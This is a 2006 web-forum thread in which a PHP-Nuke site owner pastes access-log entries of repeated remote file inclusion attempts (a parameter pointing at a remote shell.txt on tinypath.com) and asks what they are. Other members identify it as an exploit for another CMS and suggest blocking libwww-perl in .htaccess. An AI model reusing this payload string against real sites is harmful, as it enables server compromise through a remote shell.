Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke
Author Message
2Bob
Hangin' Around


Joined: Jan 24, 2006
Posts: 25

PostPosted: Mon Oct 16, 2006 2:13 am Reply with quote

Hi, I have several different identities (IPs etc) trying to access thes page on my site:

modules.php?classified_path=http://tinypath.com/sdy/test/shell.txt?

As far as i can see there is no file "classified_path"

What are they doing?
What is this ?

Quote:
62.149.140.32 - webx22.aruba.it
modules.php?classified_path=http://tinypath.com/sdy/test/shell.txt? 2006-10-16 06:21:51
modules.php?classified_path=http://tinypath.com/sdy/test/shell.txt? 2006-10-16 06:07:26
modules.php?classified_path=http://tinypath.com/sdy/test/shell.txt? 2006-10-16 05:53:05
modules.php?classified_path=http://tinypath.com/sdy/test/shell.txt? 2006-10-16 05:49:25

216.251.35.176 - web176.megawebservers.com
modules.php?classified_path=http://tinypath.com/sdy/test/shell.txt?

216.251.35.125 web125.megawebservers.com
modules.php?classified_path=http://tinypath.com/sdy/test/shell.txt?

216.251.35.181 web181.megawebservers.com
modules.php?classified_path=http://tinypath.com/sdy/test/shell.txt?

216.251.35.123 web123.megawebservers.com
modules.php?classified_path=http://tinypath.com/sdy/test/shell.txt?

216.251.35.126 web126.megawebservers.com
modules.php?classified_path=http://tinypath.com/sdy/test/shell.txt?


thanks in advance for any assistance
 
View user's profile Send private message
hitwalker
Sells PC To Pay For Divorce


Joined:
Posts: 5661

PostPosted: Mon Oct 16, 2006 2:31 am Reply with quote

thats just a exploit by wannabe hackers....
and its towards the wrong cms....
 
View user's profile Send private message
2Bob
PostPosted: Mon Oct 16, 2006 4:18 am Reply with quote

Thank you htwalker,

This is what I thought but realy appreciate your confirmation.

BTW I should have mentioned, I'm useing phpnuke (but I guess you worked that out)
 
hitwalker
PostPosted: Mon Oct 16, 2006 5:59 am Reply with quote

yes i know..thats why i said the hack attempt is towards the wrong cms,meaning its not for phpnuke....
 
evaders99
Former Moderator in Good Standing


Joined: Apr 30, 2004
Posts: 3221

PostPosted: Mon Oct 16, 2006 12:20 pm Reply with quote

Yes this exploiter has been very active, attacking all kinds of vulnerabilities. An easy way to stop him is to block libwww-perl in .htaccess
There is a recent thread on how to do this


I have reported tinypath.com to their host, but nothing has been done

_________________
- Only registered users can see links on this board! Get registered or login! -

Need help? Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
Guardian2003
Site Admin


Joined: Aug 28, 2003
Posts: 6793
Location: Ha Noi, Viet Nam

PostPosted: Mon Oct 16, 2006 1:10 pm Reply with quote

I just checked my 'bust them' email folder in Outlook and I too reported them but it was several weeks ago.
If there are still live when I return from holiday I'll see if I can go directly to the data center, they are usually more willing to take action.
 
View user's profile Send private message Send e-mail
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©